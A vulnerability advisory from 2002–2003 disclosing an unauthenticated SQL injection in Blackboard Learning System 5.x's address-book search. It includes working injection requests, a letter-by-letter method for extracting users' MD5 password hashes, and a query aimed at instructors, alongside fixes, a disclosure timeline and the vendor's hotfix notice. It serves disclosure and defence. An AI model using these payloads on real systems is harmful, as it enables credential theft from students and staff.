| Blackboard 5.x Password Retrieval Vulnerability |
EXPLOIT
blackboard5_extract.pl
OVERVIEW
Through the exploitation of a SQL injection vulnerability it is possible for an
unauthenticated user to query the Blackboard user directory and:
- Enumerate users with a given password.
- Extract the MD5 password of any given user.
Blackboard Learning System 5.x, level 1 and 2 are affected.
DESCRIPTION
Using the address book search feature to search for the keyword 'meow' will
generate the following request:
/bin/common/search.pl?action=RESULTS
&context=ADDRESSBOOK
&type=SEARCH
&operation=VIEW
&keyword=
&nav=my_addressbook
&course_id=_1_1
&keywordraw=meow
&by=lastname
The 'by=lastname' parameter is propagated with one of two possible values from
an HTML form, either last name or e-mail address. Generating a hand made request
with the 'by' parameter set as 'ruff' renders the following SQL error:
SELECT U.pk1, U.sos_id_pk2, U.firstname,
U.middlename, U.lastname, U.title,
U.email, U.user_id, U.job_title,
U.department, U.company, U.street_1,
U.street_2, U.city, U.state, U.zip_code,
U.country, U.b_phone_1, U.b_phone_2,
U.h_phone_1, U.h_phone_2, U.m_phone,
U.b_fax, U.h_fax, U.webpage, U.email_ind,
U.address_ind, U.work_ind, U.phone_ind
FROM users U
WHERE U.row_status = 0
AND U.available_ind = 'Y'
AND U.public_ind = 'Y'
AND U.system_role != 'z'
AND U.system_role != 'u'
AND upper(U.ruff) LIKE '%MEOW%'
ORDER BY U.lastname, U.firstname
The above error was generated because there is no field named 'ruff' in the
users table. Further experimentation reveals that that the 'keywordraw'
parameter (MEOW here) is non-alphanumeric stripped and upper cased. The 'by'
parameter on the other hand is not filtered allowing an attacker to control the
SQL query from 'upper(U.'. By guessing the name of the field that stores user
passwords (passwd), an attacker is able to enumerate all users with specific
characters in their password. With some experimentation it becomes quickly
apparent that passwords are stored as MD5 hashes (very common). It is now a
trivial matter for an attacker to quickly generate a list of valid username and
password combinations by searching for users with easily guessable passwords
such as MD5("blackboard"), MD5("password"), or MD5("organization name").
It is also possible for an attacker to extract a specific users password. This
is accomplished through the following steps:
- Search for all accounts that have the letter 'a' in their hashed password.
- If the target user does not appear in this list then choose another
letter, otherwise attempt to narrow down the list by searching for all
accounts with the sequence 'ab' in their hashed password.
- If the target use does not appear in this list then choose another
sequence such as 'ac' or 'ad'.
- Continue this process until the entire 32-character hash is extracted.
This process is labor and time intensive when done by hand; however, it is
easily scripted. Attached is a sample password extractor script that requires
only some manual labor to start. The following is a brief synopsis of its usage:
- Determine the current session id from the current session-based cookie.
- Follow the above outlined steps to narrow the list of accounts containing
the target user to a single page.
- Modify the attached Perl script to contain the initial sequence
(ex: 'abcd') from the previous step and the session id.
- Uncomment the "work forward" lines in the script. Run.
- The script should automatically determine the forward half of the target
users hashed password. So 'abcd' may become 'abcd12345678...'.
- Next, comment out the "work forward" lines and uncomment the "work
backwards" lines in the script. Run.
- The script should automatically determine the backward half of the target
users hashed password. So 'abcd' may become '12345678...abcd'.
- The combination of the two halves is the entire extracted hashed password.
- At this point a dictionary or brute force attack can utilized to determine
the target users un-hashed password.
A valid account is not required to exploit the above-described vulnerabilities.
Most (all?) organizations have a "preview" button on the login screen allowing
anyone to login to a restricted version of the system. Preview users are not
given an interface to the address book. However, despite the fact that the
address book is "hidden" from preview users, it is not actually restricted. The
scripts required in exploitation are indeed accessible to the preview user
thereby opening the window of exploitation to any remote user.
On a final note if an attacker could guess the codes that Blackboard uses for
system roles then it becomes possible to target attacks on important users such
as instructors and teaching assistants with the following query:
/bin/common/search.pl?action=RESULTS
&context=USERDIR
&type=SEARCH
&operation=VIEW
&keyword=meow
&keywordraw=
&by=passwd) LIKE \
'%%' AND U.system_role = 't' AND upper(U.passwd
Modifying the U.system_role = 't' is the key here.
LESSONS TO LEARN
- Usage of unfiltered user provided data within SQL queries is a common web
application programming error.
- Blocked and/or removed functionality should be enforced on the back end as
well as the front end.
- User authentication information should not be stored in the same table as
biographical information. Cross table SQL injection tricks are more
difficult to find and the authentication table should only be accessed on
authentication needs.
- Suppress script failure debug outputs in production environments.
VENDOR NOTIFICATION
The Blackboard team was concerned, quick to respond, open to suggestions,
professional, and even took the time to teleconference. Over all I was very
impressed with their handling of the situation.
08/07/2002 - Vulnerability discovered.
08/08/2002 - My University contacted.
08/11/2002 - First contact with David Yaskin
at Blackboard.
08/30/2002 - Patch test with my University.
09/01/2002 - Fix made available and announcement
made to Blackboard community.
01/21/2003 - Public release.
VENDOR RESPONSE
A security hotfix is now available through Blackboard that will address recently
identified issues related to the Blackboard User Directory. Although there have
been no reported security breaches, Blackboard would like to share this
important information with clients. For locally installed clients running on
release 5.5.1 or later (including Blackboard Learning System - ML), the
recommended solution is to obtain the hotfix by calling Blackboard Product
Support at 1-888-788-5264 or by submitting a service request ticket through the
Blackboard Product Support Web site. For locally installed clients running on
releases earlier than 5.5.1, the recommended solution is to upgrade to 5.5.1 and
then apply the hotfix. To upgrade to release 5.5.1, system administrators can go
to http://behind.blackboard.com and click on the "Hotfixes and Updates" icon to
obtain the download. Once release 5.5.1 has been installed, you may obtain the
hotfix by calling Blackboard Product Support at 1-888-788-5264 (+1-202-715-6019
for international clients); or by submitting a service request ticket through
the Blackboard Product Support Web site.
For all Learning System and Learning and Community Portal System (formerly
Blackboard 5 Level Three) clients running on releases earlier than 5.5.1, please
contact your Account Manager, at 202-463-4860 prior to upgrading.
UNAFFECTED: Clients who are using our Enterprise product capability of
completely externalizing external authentication, and have implemented
Blackboard Learning System, Level 3 using LDAP, Kerberos, Active Directory, or
Active Directory are unaffected.
Clients running on Blackboard CourseInfo need not take action at this time, as
the potential security vulnerability does not affect this platform.
Clients running on the Blackboard Transaction System are unaffected.
WHAT IS BLACKBOARD?
Blackboard offers a complete suite of enterprise software products and services
that power a total "e-Education Infrastructure" for schools, colleges,
universities, and other education providers.
Blackboard offers a suite of products. This article refers specifically to the
Blackboard Learning System 5.x, Level 1 and 2. If you are using the Enterprise
product capability of completely externalizing authentication, you are not
affected.
THANKS
Thanks go to Ralph Schindler for aiding me in this research,
and David Yaskin at Blackboard for his time and commitment.
|